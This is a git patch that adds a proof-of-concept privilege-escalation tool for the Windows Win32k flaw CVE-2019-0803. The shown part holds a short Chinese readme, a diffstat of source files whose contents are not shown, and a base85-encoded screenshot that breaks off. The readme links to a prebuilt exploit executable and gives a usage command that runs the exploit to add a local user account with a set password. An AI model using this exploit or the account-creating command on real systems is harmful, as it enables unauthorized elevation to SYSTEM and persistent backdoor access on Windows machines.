From 19fb7336564d2e9846e90f7dcbbf8eaa3fb61b3f Mon Sep 17 00:00:00 2001
From: mr-xn <mrxn.net@gmail.com>
Date: Fri, 11 Oct 2019 19:48:18 +0800
Subject: [PATCH] =?UTF-8?q?add=20CVE-2019-0803=20Win32k=E6=BC=8F=E6=B4=9E?=
 =?UTF-8?q?=E6=8F=90=E6=9D=83=E5=B7=A5=E5=85=B7?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...-0803-Win32k Elevation of Privilege Poc.md |  12 +
 CVE-2019-0803/CVE-2019-0803.png               | Bin 0 -> 25685 bytes
 CVE-2019-0803/CVE-2019-0803/README.md         |  12 +
 .../CVE-2019-0803/win7sp1/poc_test.sln        |  31 +
 .../CVE-2019-0803/win7sp1/poc_test/DDE.cpp    | Bin 0 -> 10478 bytes
 .../CVE-2019-0803/win7sp1/poc_test/main.cpp   | 570 ++++++++++++++++++
 .../win7sp1/poc_test/poc_test.vcxproj         | 176 ++++++
 .../win7sp1/poc_test/poc_test.vcxproj.filters |  44 ++
 .../CVE-2019-0803/win7sp1/poc_test/stdafx.cpp | Bin 0 -> 318 bytes
 .../CVE-2019-0803/win7sp1/poc_test/stdafx.h   | Bin 0 -> 502 bytes
 .../CVE-2019-0803/win7sp1/poc_test/struct.h   | 154 +++++
 .../win7sp1/poc_test/targetver.h              | Bin 0 -> 370 bytes
 .../CVE-2019-0803/win7sp1/poc_test/x64.asm    |  50 ++
 img/46.jpg                                    | Bin 0 -> 12300 bytes
 14 files changed, 1049 insertions(+)
 create mode 100644 CVE-2019-0803/CVE-2019-0803-Win32k Elevation of Privilege Poc.md
 create mode 100644 CVE-2019-0803/CVE-2019-0803.png
 create mode 100644 CVE-2019-0803/CVE-2019-0803/README.md
 create mode 100644 CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test.sln
 create mode 100644 CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/DDE.cpp
 create mode 100644 CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/main.cpp
 create mode 100644 CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/poc_test.vcxproj
 create mode 100644 CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/poc_test.vcxproj.filters
 create mode 100644 CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/stdafx.cpp
 create mode 100644 CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/stdafx.h
 create mode 100644 CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/struct.h
 create mode 100644 CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/targetver.h
 create mode 100644 CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/x64.asm
 create mode 100644 img/46.jpg

diff --git a/CVE-2019-0803/CVE-2019-0803-Win32k Elevation of Privilege Poc.md b/CVE-2019-0803/CVE-2019-0803-Win32k Elevation of Privilege Poc.md
new file mode 100644
index 0000000..a533e0f
--- /dev/null
+++ b/CVE-2019-0803/CVE-2019-0803-Win32k Elevation of Privilege Poc.md	
@@ -0,0 +1,12 @@
+## CVE-2019-0803-Win32k Elevation of Privilege Poc  
+
+CVE-2019-0803.exe Win32k漏洞提权工具  没有编译的
+
+![](CVE-2019-0803.png)   
+
+另外一个是K8写的成品EXE，提示:自行斟酌使用任何提权EXE：  
+
+`https://github.com/k8gege/K8tools/raw/master/CVE-2019-0803.exe`
+
+使用方法：`CVE-2019-0803.exe cmd "net user test test@321# /add"`
+
diff --git a/CVE-2019-0803/CVE-2019-0803.png b/CVE-2019-0803/CVE-2019-0803.png
new file mode 100644
index 0000000000000000000000000000000000000000..cd353a63c5d06d2a4fb7d9046f32b24a22676a78
GIT binary patch
literal 25685
zcma&Nby$<p|2IBC2?a)o^Z+R(m1dNZA}uWqg3_SG$k8DspbY8m&e0753eueefsGnD
z`Zqq`xSr?v>-WdGu3hIoJNM4H->-PT@3ROEHAUiwv=0FQ0I|{=xpx4-Jq)&$6X0Qc
zd~P5A005W(N^-BYA*nm9o-GXWKW}e~+R~KkmHq8s0Svn0gZ*ESJbfmojT3GWSSV0k
zh)b@Js`-7Rpc?+?K7Cr8JeiRnH?mN6=CSGwFB8*XdI-aJ`Oi+|OqX8jzPDTBo2T1a
zhE4?|VrNIgsP*)5os$VI<!LQ-H;+2eU5{m$p|C?=s2g3C)wn{-&CC~3$b1800(wpr
zwd`)!Qsw?g*uDq=s3&@pTkx`sKsNXSf}<(+DM3a7k9jV4OjTs|An&Ddt6%kLI{{P)
z<{J0?D@H*qjz!a#ZctAz)XO}YU&qFx(Uwy~lVMOo#dG_Mo18&I?jpfOYd-MP1+R@0
z?N0op#&-5|@`p8Vvd*)j`2sa=tLRK*VGXq3I*=P&RUb#FQ!h54orRh?=tDZXvcYC%
z)DN2%TS0k|Tnie2B5;y+g343d&AK<ta%s0K;Y^fnW-5Gmv5MnLG?Nvhf4|z|d}&fx
zM8<@^&X#H#uIxt)zA^t$8!LB6elmdDYG;Fo`1Q+-&IuM;tJ(RG7SGzsC@aQ};u-z;
zw<+1di+YOesW3Z=kA$y&T^tR%jH$g(30-Abg*>H=k&Ef;>xaX^G@6@oRPEqbm+Cxe
zB+MeX<oe4Eq+i;PG_iY#GK%(IppHOllIihUF9a&R`Ca@$aL<59Jd@ww;0Rdy^Zs`V
z`aIHZ=Gng~cwfqnvMFgoz(jqMTlp`lgGPg{vMB%^jx)06nhe?@_7lyHwwZ6o4p<ud
zmy({w^@B2~<AmA96km!C5Vv|pWJ2FQ$BUL+U&&1iZL|DDJ;V?dIohafxy5phq}PMy
z&_4haLi~;9!?v}~IuC_X{v?CRXxwuKb<1+}BuP10i~D=czSDw7q#K22ztLC|T<Dl&
z3D&>Ahi9o-v1}Fy?gk}{CaLyV#{LntRWP)gVMfszl2zPz`>Ib($L@WEKX!VtlS~*Y
z<TqC*`iOpEKE?URGus)fx_#y6Py0*yK$Bmd*>2gai{s_R0hQKAxnjVyUYUMY{GeqZ
z@FBBv&ttPLcgq8#Td!7kwO<O|AoPrEGjp-2+^z?;t|}S)Vm5JHAlKnrT#5@UB9TIy
z;!%x@qAX6?G-uB0yZM|CrQHvzP~NT!cCiIz>MXTfghC<6ORt^gET5QYlcfH1b_N?<
zxydB1sFwSjla$=g<^LS$J+)!RZ$0Ne+y6H8+HO2$eN-ejy!VU?WUJt6HuMBz{M2$Y
z!7Vx1<TA4WB=&^%v{<tuL_X$6D{F>Tur5cLE#+CDDh{`D%c@&@Xl^Kx?NHR{!*>e+
zjrLTKDr1SUaZ9MqgOhhY-N9@(%34qI%sq+>S%SXi3GGCT#n&?*Oj!LX3|sP+$C1%(
z&#_$y@z;wCGSf&1`bcuA_%Z8bOIh%^Eu0AXPWSOZJQIpPmUm#f<+QkpN@%2Y^e@m0
zGnxCm)Ri~gn^z#X@KvVcz`|qV(-!>b{mg7PlcJ}s?n3um_7~V?KOGex&G2~C_i{Y7
z{rLVR`jhrh*&l`$w~q#+;a?~5#ylqy5wfuiuc1_Ad?s%qzS0Z+BggqMS8UvqFg;?Z
zl#)%q`}yVZBq@y;veIW?QI?BR1osvhIbyb({A2KiF-<T);Uub)w|W0T#ZU>&7j?_6
z?vRVxK1r$(Nf_JtFTQ>}cawjVC#J}#ykUw8`3SivI*v4=v~(AQNkTz|Ttc}Eu?`p>
z6IIW@Ar^!%TbvD6KFT`V(;;qr>|gjsyV$R>^n6pNJH}b?(fv2fI8GUkK8gvGIZjc@
z3ngdB77j(AAHuN0@^E+_+bHOyymutXymwk8+4sqP6kLJb;pS4Imr}Z?tx=ODOM#^R
z95M*rV#ZgQz_V0g@{dcSdIDE~%AFVrbUmY#!4dL-e?bL(L_;*)OU(JI6=ndla#>zA
zvbm@KUb*2ahJvmOB_-|ixw8J9pKS?+%+!NfQXO?BQ2WbA24}CgIDTC$kH!`f!ic>H
z<!?^pJ`C7Oy^}c}={FEh55K%X9T7@{0#lyTp)!HcQ~_Gkre?l(dar%un;QU37gQ@l
z;%QORr}*uX2G{z@Sy_8>B#g3BNO#V)8dB-yJbY<rvB5c-!cT&^1d-^!c`uzKFqWXr
z!}AqPkGLep$wahX=Mvb}9w#LWhHX8wm-?jUBtc8^=PO+5zHO|ZQh((Bykj%ZX&V3R
z_WSFJRt{W(^<|ISj7rZVb~&ePI*EV_=MkIc)o~GAxTi=<S@KO#dlTV4rhpFMiR&&V
z{T)m<&212-H>@Ad7>nv<9+HlIt{<LZ<V<)|xptJ)gyC=5UFt?R2%O5^GH|SA+nT)2
z2eh4#nn+o;;~8H%Nt5kE%DuwcA6*}zE3~8omqXiQn+c)k11c&6C5=!iDUlN}eLKdh
z#lvF#LpkX7(}}2mrd6U*%%b(1h5DVN8T|YN=nFX<w~<gqS;Q_2Q$R1w@{o+Y;n)|X
z^%O0~W6rpDzOyH)Gu(ZxH`0R%@7bz3>I|?&5o!tzljUWm8z`h?B@4#0e`c|Uh_>WX
zoF>14wD{5U;^lG(GsNni3rO#EDxv{T(!s5~1BcD(ectMARVKqB(dc;c;#JB|42jFW
z{7aW83YRlrY!7^`+J>u3d@Y39$o&kUt#R^;nW^{|KVb{$L~|uS`2|1F?~nLy=##hj
zOD=gcEk1lmKLyynFMt#m<^RWyxp@Jcx=(m@;&ct)Zrfy%pz&#9ZQ+f`Im?LJ<#3D^
zvYWyIC`5xo=x#9N0JDblV(_Se{mGD)^c+J*qR8sVkVlVG|48p%q+bk!BW=V_##@4(
z3X`s@O^<%71k)bia(nB$f>*!AL~VD(>MWamcre~O6*nbIl|H*^b(MH+ZZY$<UT7=G
zy!qzJmG=|^{}M0kVqcVuYOzt;@8D)P=zY5L<Ke3*d!zbFprT3?l0o2omIYbK^ru`(
z2P{~0csR0mK@XGNar_Qf7tsa18U5dFPSAm$uki{NaR4>w=3YDWwoTm5Q#|oDWs~1(
zEQbZ=)r2ZN=F;zjx{==<p1pU5bj4wo>=ZfQQbjkDPVXJ_n%&T*O4PlaczcVJ>b7!{
zbh1?k8M&{Tdhw-DZP7QT`JMo<g=!>Sn8CY0f!-U}tAbuIe#B@oXj^=w3#jVZ$n^IG
z4bGFbxipe{PfB$sWcm9TU4)0l&cz`Ybc)vF0*{o-JK7X+L|QHyo4g#FqP{r?8n%*9
z@-{!3h_w+aU^9v?2@Od=ZzZWwNFRTqmi?U`!SCR!Jy|!l5(^|WJ9=*>>95JVs46q~
zFnFuWRIfbXfUT(se}%Xt(@y_EiU<(!HSeZ;@2yTqA$idBY(d+mMfj0)U{F__^IZ7*
z+GRhVhGLk}^<`Pu0g~qOxmt|!i*{t^{^$KwNF%b-lse+&>h(0@2j#T*_wgQ?E6hO$
zJfq2}b%zn)R`%jVk_u7Z4Gk(tgo4T~9YtSFNT9-B(Zo_;7Jq(tzZirIF!NTqE<m7v
z-WvD=jU@&Cr71~V_a8B}qd6A7daTMqjl$K{Q%v|cu1r$C$%TP?J0>f?lG4|n2=)g0
zOF0%A{@E&`s*A!w-k;5xdT9>*4L*e!xlJpgTUpqJd!n@|PsJRB{$=6U@ag+|m#b_t
zM9!E_SAJ0G@1$A^pB3TjSsSk|6aB#U9%?m6y+hZTb}SSAJ_8ut7$slsiJold_c_(;
zvx?6Ooyu_%-AZm7z4AVc?)~P(-PQ4xivGfY)N=eE55OOds1Mv)iu#eFXFeNBso&Jr
z&MpB5k@hgQ?cznzH`Kp=AB2CnnsNZ!K%pD3?eOaf#H!b;rO86l#MkoRXsaR?|NdX-
zX2gu=&TCAQ1inCjOb3m}6~n6o-_7pffU7z2s-qb)Ojzu)#*i|WoZDj<0@8RgN~j(n
zxf?&Tx|384C>kt8I{i|1-fD}R^*SDxX1oROCBT~*JK6-C14QwG+zQ>#EJ3b`*=G}E
zGj3M|J77OncS$#?ixNEh^E3|g1~f}a2F2(+RW1anm{WNf%iBG|9@Dc&5r|N~{`A;A
z;|0053U!1eyHRKXAS%P}X-wk=n0qhQ3q;-_BLT_k(F3N%Jl{`$<YLa3UOrv~Jo9sZ
zd^*>5G3)fij}h;LuY<~6l<;i9P3&~m{PA6DbKZOxUclS`ok7t&<F1WwTGFukOD%X@
zeDXn;x0yv;B0(yRw)ghLeFgJ(sD0WX9;TTy)el7N#+2Yr2AQZDEd5O=<&<O$p;fT>
z6WTUT;tGhA){qSKTM#M0H*L9im?~6+uf<^;@R6A*(I~(s!K*k!%h?oqGIOurQp&L>
z71!&9!|<*?^Zj7`U^@?FXYJhPLkS8K6<_2-mHF+5MwbYtozmt9`940v|8D;&aeKg%
z+RvIdaoVrN(%(P1GVwcm9_ORh={uBtPK0#c)go&!o+yw+_3N#arjc~^0(hnPi=CwR
z#B&sRptHN8b_H6_%Zqx?y3hR1j8;%*B#Gj`_oL=rmSb7?N8pn09A*7v0BEmk^iwMa
zp7zVfD&mI{fK79E!KLbX7hTqC1CKMi4O=TY=|OP$;Ma}wyyjxx!y>MOQ{(!+d5`VR
z0H=9cX(*?C>`G~Q+W1!r30MT)_OqzzZHinyh7){HYKYjSls_U}jB?rQHjId$PB!tl
z^{X2$YQ;&&zkH8pi`)<y9A@l0QE#_$nG!H*Y1`>G-E+@uZWBGGPPO(Cp}2ygW#et}
zkW}-&J%OBD1DvrTj4--_*z=JXpgmQ3Wv-}UW}S2y{S)#q^UX_=el8v0O(59wb?Wm$
ziNv)%=q&Mw9f~RQ_9TocR$OV@SLkb64Dfm%4e9q)Uz_lytGGlVy=NIr`wE;{ZmK0(
zNI-HX?wd-Oe$&)&X})F>3c&HQCppQ*pwHDghd_|%rgZQkRav((1)vf0dB^3(=&Brg
z;3W?DMJRx7bQ<oXd<3)T3+_NX23+j7++R-o;(}`P?^(rs6{VJjqwX7d^_&7O{$9>5
zx+JHDUBd9dlD?Cld@zAbE*deOn4R17aOt+TCkU8PjPFtd{^`wMi7WJp5cPCBz;ppB
z?02?rcTi;W$yJCiIhtx;Kd1nDpSv0Lp=GmYdF8l0Bf>ZPNA>!{-%SV7E(p7m{@cqs
zeDrDB(gSY&Agz2Ha^Efd7q?GW`lhE=yaE0p@PA{i&ii(DFGxBB^kVx;AF1`U>ZM1p
z#qNgGkibEVo;&a9g|lcq#+na$-1y9tCRw2WkfTXLANdvxkD5lhDZE?!*(yRnm$Ra0
zx%(?cPV@#pvQAg-0T8EMniv6qS+6k%;=nW`+}pJI2?D^~j`~3F-ifo|y+MLm#2@Z%
zY{0jASG882;DS-YU+tSNCr->z7pI?A@uJdD9uM>0+zAl7J-|YV2C_P|52guYa29j)
z*;Uygeq{#wcXiQo;U%_`$>f71gdfU!uVk@(w8$um<6i{RiTHAJdu!;0-F64*f1bPl
z#qau&^VGeXfH$p3YG_ZL{^!frNf-AfT;=bCv;!-oGqhJ{!3Srv@ck;gm*{^Ut80;<
zp7^FoypX78%Dfe!WrST=r&YuVr^j!1XIJyI2c?Uyh{N~cccW*Mprb+hK0R{3*!0XU
zR8~azD*8+SoLDivr)V7D(Q+)Ng4b2BQX2W%bs^$wsPZ8VY`?YKX1QAj<<$EUA#KvC
zTk<x4?<-y9lWqn3P-!25t1@BBnFCcJ^k^Q&w{JIaV18$`FeH8!Ztb$t+D?vMqVky+
z-cO6s(i7wjQit50zz=bQrrX(`4$b%;x%ABpRm!orAXD8S@-6}(z{<amRTA!ny0sAk
z=pahzip5tV<`+t$r*>3`J*kNw%Yr{?+m|CSD}QPZVi9Ulxv1_n(<Q(H|0Dcp#t7s7
z*q+xJ@OyB!>>-hn-YCM!t#Oimz1~L5N^l%zd+j1|Ve@Yz=34reRz1WmP>TC}*|S5$
zT045vmHx^tVEOitkQ<ljGNYr#&>Des0;-9gp8t}dXBhkrctNM<TS6;!;+)Fie{|Do
zOUkhmYru#HGMy_ZuZ;wi(tb2sXyaIWCJ}sdqu=s8Y}LpGWUWdYZTC3($$pVQg*Y>R
zp?d#wy}ekrFF5<qDfziU{KSQz$d^<Ficx=;`u}umHkib+38f*s1GYsm*`7&Xj%0#X
zIEONN8J$Vl)wa6hO-FDY)1teJOUT301cC4qgVGLHdLK<Uoi(JwPjw?NeiHF*rn=RK
z+fW=4Y+UJqL_Qt&F<?zouO~*U?8X`~=tN|~Idcj36nzL)FqH<V^i0J5>Fb5@7Ve`M
zlfx<|2BjDnTO5TCexdXo2b|8cQRuLy+5!ExEw8J4M=v)0kq?LO)u8czcPkGCv;xx}
z86B4+AI8v)EHFaOYPu-1fT{SwRvFH$ZJ!yiqeqiYen~7CriljIsLkZzU+#|u;l?~1
z<2FnzeiJO1dAyYcHiNAWh&;JhVuCZ(n)l5jaVvHv%Dh{|az-~LQ2i|5w)ny|p<$5$
z+l<TXxWywpMXlymKA)@2KgeKd=R}`$<H1Jgwo+mRid{UwJM_OQ+G-Nr3)Dvxr6;Bf
z#$Vh;&XdiRn{Zx*QHryELhLSAWEjzEUj;L`WG01CSqKDMRY>3WTu7&m>=<gZI0s+3
zp_MT0HY`;rjM>wt_vnv?sL*58ZgnG(lg)cpbvpRszg&HqoES{Dpah~8tfz&%^UBYe
z3m9T5!jBGCvTc*wIGnqA0KB5q-fHwAk{mHzVZ7fu%BC${pt=6$ApUn5U(@x^<P=)^
z71~meJYbqfLthR{>?+sm@B>&BEeCTGoYmV6+fDtZ2a>=xz?NgDyK6%5v!+>M<aS%h
zgkH$L+m_Kvw)a7;{P6f$2ELK2=xK52NXy;>Za)Xr^)KwFIF-{jo%@~;s(iJFyf(r7
zx6UYu;J!CPOk2f9l!|$l5c{1r4hw5H3k3OcVn(@%TLzv1_VIfok(}_VcWROX7+-Om
zAjyxfU%aeakB9_CP5L??<=lVaei<}z;<<_oS=-QoTy0E3cAQEMewkKuG9z@Zb=1{l
z$+n$oFXE;yO3<7Yw>Y=0XQlyec8{|sX+nwSZ7Hr+16=l(Y!R6Ov1yYj4fdTECv>z{
zLZ3*m3C1m-Nf-<U^g^$GylLoNc@npZzq#^jSHY}+&b<TJ1wS*vL6?Q$jo-Mk_i=r#
zS?@Ez@C<jVL{l-E1UXStvk&)dwzC~XcLxzFe$u~7Pj9_0-(@;U-MH;=xJ-{}jO@Nd
zlqx&V^JTnR0jTveFF(foTZNe`m2s=D{ew2$>-VvMMkTzuWq={}^88a@P{8=w$QXNM
zw@@kJMH!-?hU;-y&<ny}@-W2jdDxWG2MW%nt<P7kWK0{bKDOJkm||=+!9tqtRQvHO
zGNPSsUChl~9h0NyUr;r08%KV$%aC5>vH+<yyD+Z@U%$NUK60K@eH2tC%62fJS`%b<
zAY{o%eL6>C8kbmhU0!GCD=vd>&icsLNI%UT2RQ8=sE`W((i;u2X^dKDW4T2_`Jk%`
zD_!``hmQ%L!z>0W{@tqvlNJ4mD$cm0p46~eJxK%c)8DE!FK=hmEe0Vp&-F_M)Xtxk
zOPoqb)QT=Cb&tHevy;EuKJorbYvN<#FdHPSd2yS|hiGfFP3?stO2uI~he}3<f1vwX
zdX`He9ao!|wm-h?1x~^@-$#hyNA=Z3T2fN^F}5>WGl&Df3}?h{Oj-_ModlI7?~)i>
zlr->*qt|DR_M@DQ?;RN6%JHMk)xHpA{Ea0rT|<cH>7RaRsvuB6eFli&K95d0Rr=lH
zCVYb!)|fJ*nasHG(#@Ba{Dt~i!rL$K4o6EWtoPAByb`8|H2OYb`Kk}s_I%&0oS4!*
zA2P_2!s^HrKB((QtW+%5hCRKXjx*ozQrPbYZGHsh-o>2t(0jwz1KHtiLB8rjq#V>K
zghg39A|z=8w>OWPEh}*QaATv(^Qve)m@8cnUi5;FK!OUK5jy`(ofS_?`vo|tBdJsH
zT{iy<{{SSf=V-%^2m7i|>Xx(Jc^dr0^(NP@;<*$p{^_yBTu&-P<d3$Df|e*guHkc8
z<1O7x#I7_HN{K8}E%;C^W!)aOC3+=vd>2C<G@KcQ8Uq;voPzt?&q;6G`%b@Is|&LK
z6vj1ew&Hzq@~6j}1IIh#=BeK)Y|;4`)7gI!bG{J?&%Ov>gtL(JKcY}v8`qJKIq!`W
z^}+E!GY(t!{qk5!)b|7F!Kx=_e3HTvS4C*FHrC>7T*2ayXOgJxhC@Qctx~2>Rhm!{
zT1};%Msk;)XijJNw_3SgTba`PUfW;wb9kdCK92Nww}}B2_n|LN8($DeBC{Js9|C)$
zY%LeVLR<G5*d4EbznVIs65Gg`*^L6JwARu3t>WrSJn&zj+HcV?JH_{MetAQ2WFncx
zT+=Fj1x@l?VNN<dSvmV{`H@)RXQi~%=N)v?7c=$Us`>;_>%CaTwXptvg-N?-LvlMu
zRR&34Ze>yh-MmOo=MgR#wYX<gQvULjsB!X+8J6;1Vye>>46gUnbCuv8Ir`TAfuwpZ
z4E?py!U59t4R`5=*lD=ksQ2zblFJ7mZ`;8=Zm<KGq={7Y<`>8)su8|AIkLK_C*}Xe
z9n6|7>+DmJyjSB)(nc{<(3a}W0H!+P^Tip8DU>RQ>=^x0_I|;$09fn7uiOfc_~tLx
zPN=xn9J}Pt#~?~GUhH{$Flu+QIXBVmOhVGRlQ#V5P;~c=k4LA`j`s)Oiz+}LsDY!c
zRtxw~FCo2#39i74;3tW$U7Q%nI-3g%yomg6e9G4WBar~XPd!__yX02rM9lsLgsqfH
zruRcz&%VHqlEV(#ei|a$0f5^G(>B)+m7Mv{x>iy)iZ4eMIT*5@28)urQ%#HShos)>
zY+rvdyGP=8Iqy8}AhNohhpG*{mw7v@c+f@@W^vslR0mi+2XOj-KL~S^B?#cb#igb$
z%zQ@!07zWT$hbO*6H;*OX*5SnmdvO4k@<mFnS93oZu5mpCO@epm8S9dcKS~O0AGPR
zb>(Cbh~zcihyInQpMv&BK>9fx2|xiQlDJFHX0}_tyFm{oVii`Y&pBEI3(!?Lg=F>w
zT55|Hh~TGX>;~%)#yv@2kA;IOssri$6n&}@ZK<N`)hByTQq9-D6h&rlnfmixcb{N>
zvCw3Eal#vJ;_Y!0XT<q!8l7_)x`!v4<xA48ms`3kZCa$QS6<Ae|6^<Ut)SxxpN6qy
zb~MMV#!{ND<d%2A4I#A{#JyiUrTC~7J;iyvbe1VBJ94z*3F5@XEtKO{zpbX6@tjX1
z-8<JtEo6m$HucGeN=gN7Aq=AhX=}DIzpI(jl=ersO=E{x+I8rTVz9X#26c#H;YXHP
z&~}5WM->0923?+73~XPL>^=Rcgsa-plrdOarR2}az`nA0>;6*e@|xo>v?q?5k<R|N
z)sI0Xd5J99?^n;pE5o9s$qS5~CCW`E!ep0I_N=S($xc&><HiIS1S)=poGrGK3Y44;
z>gHZtDcxo9*D;7HCU?v)yYzmK_vJT%aa@%{L4Ce|y(_#>{66!k^ih$WkWMk>8nwgD
z^~p;M`-zlN=qr`!2OjhLW~C;rZyW2%zIFH$sNaNpkeH1Li<@hYOij|*S84`xpeE^z
zYAYO{#{J70HA-#&Ad^aT68sZh3$^Ak`sfpIab#MD`FM=EH^KX*huGU_@B4`P=#SSe
zZ;icv_+0b1fZNy|Df;U9!$u_4jiZ&{PIXd7=$lTwIBlI?L!aRc?U$>=eqw<W4-2|@
zw>|Y%u!Xb!U*5F$URD9<+Sp@RN!!{Wgqb01@b9Dj%6;XR_KyK8Obfx{PR)cP+{UmL
zggm+SnRnq$naE-Obg#@r*z~#>?YRtlFG+gyOBKs&*HAT^K}1mCXeHf;>A~zLW~sTN
zUj2RS8Y<M}c^=`v?j<~y|Dz21bg-18&^9`w*m@q`&o^tT<U#;woAGK`2_x-j>Z8f0
zaN#2hq7%DcA^-SfO7?!us+mCe-{sPq#Mh9@lN{$|vZquPi>E`}Odvh0g=mvz&R<&r
zVNgn9Qer(T+XGfw+gCg$KlR>MQ@fMI=Ne4V*=Cv-Ng+qWTs|!*5x&tj6{ffehki-S
z26N-@e+4erKBh&P;k>{|7cbk2LkAAZEcjD_xth!&7kg8KTf1Ft$(fOiUW9LRihpq(
zYQ$Lazev*Gd?T`zd%62w`hoWjJ(E&R5zi>g=iw=dvp106zrxVi8wn5+`F!B}!;R}G
z`@PsDk<5}Oq_Fi(E;+56fpKyLh|1!Ch_vqZ*fUrD=fugn7G$h$`60?$yb8sx9|w8c
z%{yt*Jore2*8PWlp;LN|>L+cNul~3!&m#}gbG90dK2DUhlP#&}iI8QwaQx{H;|Sb1
zXJy^W3cxqL=G8!5tr9~57)>QTyX??HvWz`iUQUfP?nM^}?#$srPHv-CP2I={?_K^U
zMQD$lX_ExXvpKg7{!+X`R~5&Z?Xm<CxtHf8HzZ5U(py#dWGa>bX8E;#puV`-R}d|G
zk=Q>SE|a4JyR$zca|BuZkJ+d_(p(%To?9>Igc@5pAaE5W9Nu+<l%0epuumsaWN(g0
za3_~V!`_<Z$EG<qh*<nNVSA^yy2S?hJ8wtf<G<Y%I#i|#F{o;8OC>2=jT5k#*RBgL
z9i8C!KEszb;hS1ie2EqOs!3fIGvi)6g2>zi!q(HK<v7Nj?p#XeqZJnX2FCGdUOrC+
z1F(<ltdvt~5AB?HB-#I*1&C_qFJ^n!1FVpC6mSPy?!d|8avv@tI0xgL@PccJ7BWI>
zDTwjf0+L*AulM~T#rJ(PU;Q9p4knHN0mg0L*{{ePisb&*Z(U*xa^7qOu2AXuR?sw&
z$q+EJve^RDhctpoW!@Mf!p@3@1ijlRu>HAgXxZ*`WF9Z}3W1H14@#;sSHsKO`yN2R
z`uDHzCLG;Qq`nWl_mB@&>^AB`xY(}>tDJK@hw<DlEtwQl|8&(D7=G_30}gl$Y$4Ng
z#nnll!Q&yZwOykqff)Xv0TF*8jP0)qnXlZ~pDV~d=lDr5Gxo8JQ6}`^Y5)2gP9uB@
z+Lglruo5SDA+)TbF4^3!UaCyjPbOJ@vg1pd6rm>Y^~P*rOT;J06-0tt6|Saes9#GY
zkAzKx&nDU=aN~OL+gt_|`Ht~!aG-Zoo7e{C6FH*AX$GAmq#lgkds}y(nvq*a`FoR<
zvN3p`-0`s?oY!=byh8a#smnN=Z=`R?;*kj1v`&MMi7upe*a*q9{qS}CspiQx+&(Qz
z<F-~o7iJ<vR+pw6OeF6^cyCpyU~?S<@j3dGxJjn=PW$|4%ewQ*q^gO^YPr|;p*x`n
z8Bc{Hj<z-A82;Sk{k|~_#_KzFs-^nOsKsIWShF=d;oYKK=(nt|e8K*uZ%~$>1^522
zNL4-&(+KfoMIYywgIQKAGL4Sk(n)DQD^4G)H>?>|Rm)ioCemqH*(JouM;!?6&Hk!Z
znSI!E5__YoDr3LeL#)SVsu-{Q1brHruRaH@IX!C`rlR%WpCB`?aV%-vZ<cfer9-aB
zB#th?fap-)vHC?()J}ynpI0GqqD{nKw{s0EQXS<cgD%x+LAQ(9V|7{+c6k_2Y}3mV
zh96OomfY3)+ELM_w(l?>!wbRHV$on%aJJp)zMZ>-?TU_xIPn$JZgsE{0rQ7XYegiV
zm6oDx#S-o!iVZ%h`f#fb8)`Og5}ggdv3*$H{v45h_hC002smCNWDfo|90-!YhVfVc
zhMd4LrGRRgpVgCO_IN&V>9Hc)bgn7a5+rHe;E=ydb^RpOqr&QuUW!TaF)!;Z{_DvR
zOsY8ZEP917Q~57U{dHXIFM0fuTwFbgGRLQ+#3IC*`JGc%V;Xq%O6s$#<xM4H{oM}W
z9+zEpoB4_ScAnUlLG@o6iswnGQ?O0kL!o4=1=aqqgL+n}D(Ob>9E0~x6`$<EKN!*}
z^}5q_O*Gek0Exw!ZBsLXV1j!>u1gMcY<+)U6|V_JTGMUT!pPpc;Kbp<*z94#FL`vD
zsikyo-IOwPZa+aqJkM+f)d>il`LR#%1WvsUuZktnZQ7X6?c>@7q-!gXJ>EV+CVnww
zGoqB9lg_>#%5zGJ$|auGp*05Uyid8|-Bha?RDZ*fBYY4ibTK#d&!Ru#r!|o%Z+fD`
zfxy7CY9e{BgL*>!*;W4(4|);Te4R{dt>7E;RQG4n%)9<T2&s%r--4^x?)IqXmK7Pv
zcXpua$3lOLW4^H<C%5=x;56ZTfq~-oVU2lqW$<}0snDeNrq!agh~VA;L39BZ+G<pn
zxr~>0sE`#J>g5YOIi#?Vbxm__ew>Z-%4|C1BO;=ov2%R#th0X=Wr2#Il^Z|Iau}F$
zO?$^?y7{_Df>VcHFLp@2?QMIt%L(<+!`S|plZ|$u{Mx1ii0PZpo~$J|oMK924PK0_
zxs;?g{rlfZDFGej>OMd5+6ZTep8bdDR@j?o)ZClAw;{2{QgRg$im`Y6=Be2lxrAUB
zRt?2V!*X04#y{9Ue8%J6#laorc_Xrh;s2pK3XOevbw%tD0vo#)k3BF^v*V^Y*HC`l
z@!?$@o_4k)dqDQ(Z|oPi(E|w+ai11YtBd>RD~FKGvhw*xp6bN1EoTZ($%67Z<ChV4
zF$k9`V2n=5B{@%(vU$+LRuR*Ma&ia~!lkH-Q)yTvmIrUh{b`CcNjx5{HK>2;FkN5i
zK&0gkFWD<TMmwjFxERd~I^5Q5XRrbju&H9kw`_F3+8jlS@Y~W^ddzm#OFi%1;|=i;
z-4}bK0eoc~Q-mMVdLIAZ(fIrkblDj2Dw7;rQynuda1n|7P%`|<Xqv4}0;b`%RAYBz
zFy3rN_gHn+B~3-SRB2<rrAqB*F1$8lDED`*_O1m+`+A7YSNGa&vrw(A1QaYt0X+e~
zf}D5^PtSW4iK)qG<FPvKWCtmUev*rohkiV9cGxzKN{_s0I+owcU|kS=){NB1oi0gc
znq}AcL!{R`UDrOet~3qe&E1tXIBxhcFm<cl^!IN9|AB}@Ijx5}CHD{00j8!-rV$Eo
z(aQ*RrZMUqiQ|TWPkotG8G>v|1y6y%CE?ec;`Gi(F^JIWUtgG>WAF4K(0n}LoArv*
z9MP-$CO(qYd+Iw}McGGv-IZJW)~LL(-jJ4KkCVX2(u~6CM0Vr319x_%%XxNns|hXa
z>O!Sd4Zw{V-=_NK;e-Uz%rXEO0)p@rN%Umw%G1{PY+@bJfHxG&@(sC%3Hc+O8MPd;
